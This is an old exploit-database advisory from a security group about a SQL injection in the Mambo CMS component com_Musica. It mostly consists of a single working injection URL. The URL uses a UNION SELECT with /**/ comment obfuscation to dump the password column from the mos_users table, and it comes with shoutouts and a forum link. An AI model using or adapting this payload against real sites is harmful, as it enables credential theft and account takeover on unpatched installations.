Mambo Component com_Musica - 'id' SQL Injection

EDB-ID:

5207


Platform:

PHP

Published:

2008-03-01

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
-------------------------------
Shoutz : AurA, imm02tal, Kinglet, iM4N, & All our staff
Mambo com_Musica "id" Remote SQL Injection


index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*

Original Link:
http://forum.aria-security.net/showthread.php?t=588

Regards,
The-0utl4w

# milw0rm.com [2008-03-01]